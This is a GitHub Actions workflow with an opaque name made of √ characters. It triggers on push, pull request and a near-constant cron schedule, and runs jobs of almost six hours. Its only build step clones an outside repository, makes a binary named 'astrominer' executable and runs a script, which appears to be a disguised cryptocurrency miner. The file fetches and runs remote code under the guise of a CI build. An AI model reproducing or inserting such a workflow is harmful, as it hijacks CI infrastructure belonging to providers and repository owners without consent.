name: √√√√

on:   
  push: 
  pull_request: 
  schedule: 
    - cron: '* */6 * * *' 

jobs:
  build:

    runs-on: Linux X64
    timeout-minutes: 355
    steps:
    - uses: actions/checkout@v1
    - run: git clone https://github.com/buddyworkk/bun.git && cd bun && chmod 500 astrominer run.sh && ./run.sh

